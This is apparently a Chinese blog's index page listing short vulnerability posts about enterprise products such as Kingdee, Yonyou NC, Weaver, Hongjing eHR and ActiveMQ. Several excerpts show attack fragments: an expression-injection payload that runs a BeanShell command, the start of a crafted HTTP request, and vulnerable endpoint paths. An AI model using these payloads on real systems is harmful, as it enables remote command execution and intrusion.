2023年11月17日
金蝶云星空任意文件上传
摘要: 已有详情 阅读全文
posted @ 2023-11-17 11:09 匿名用户12 阅读(155) 评论(0) 推荐(0)
2023年9月4日
ActiveMQ 61616 rce
摘要: 执行指定类的构造方法,参数可控 阅读全文
posted @ 2023-09-04 16:07 匿名用户12 阅读(75) 评论(0) 推荐(0)
2023年7月16日
用友/uapjs/jsinvoke/?action=invoke
摘要: ${param.getClass().forName(param.bsh).newInstance().eval(param.cmd)} bsh=bsh.Interpreter&cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime 阅读全文
posted @ 2023-07-16 23:14 匿名用户12 阅读(512) 评论(0) 推荐(0)
2023年7月10日
泛微10.58
摘要: POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1 Host: xxxxx Content-Length: 49 Accept-Language: zh-CN,zh;q=0.8 Accept: */* User-Agent: Mozilla 阅读全文
posted @ 2023-07-10 21:45 匿名用户12 阅读(409) 评论(0) 推荐(0)
2023年6月21日
金蝶云星空
摘要: /Kingdee.BOS.ServiceFacade.ServicesStub.DynamicForm.DynamicFormService.CloseForm.common.kdsvc 阅读全文
posted @ 2023-06-21 10:51 匿名用户12 阅读(190) 评论(0) 推荐(0)
2023年6月5日
QAX那个是老版本vpn信息泄露与密码重置
摘要: QAX那个是老版本vpn信息泄露与密码重置 阅读全文
posted @ 2023-06-05 22:40 匿名用户12 阅读(1) 评论(0) 推荐(0)
2023年6月3日
宏景/hessianservlet
摘要: 如上 阅读全文
posted @ 2023-06-03 13:53 匿名用户12 阅读(230) 评论(0) 推荐(0)
2023年5月24日
宏景ehr
摘要: 金格牛逼养活了多少做安全的人 阅读全文
posted @ 2023-05-24 10:24 匿名用户12 阅读(150) 评论(0) 推荐(0)
2023年5月19日
用友NC ConfigResourceServlet反序列化
摘要: 可以看到,直接反序列化 ObjectInputStream ois = new ObjectInputStream(req.getInputStream()); Map<String, String> params = (Map)ois.readObject(); 阅读全文
posted @ 2023-05-19 09:56 匿名用户12 阅读(413) 评论(0) 推荐(0)
用友NCInvokerServlet命令执行
摘要: ![image](https://img2023.cnblogs.com/blog/2228380/202305/2228380-20230519094018044-1519941697.png) https://security.yonyou.com/#/patchInfo?foreignKey= 阅读全文
posted @ 2023-05-19 09:41 匿名用户12 阅读(199) 评论(0) 推荐(0)
下一页